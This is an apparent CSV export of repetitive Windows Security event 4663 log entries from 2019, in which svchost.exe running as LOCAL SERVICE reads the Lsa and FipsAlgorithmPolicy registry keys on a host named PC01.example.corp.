S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + 
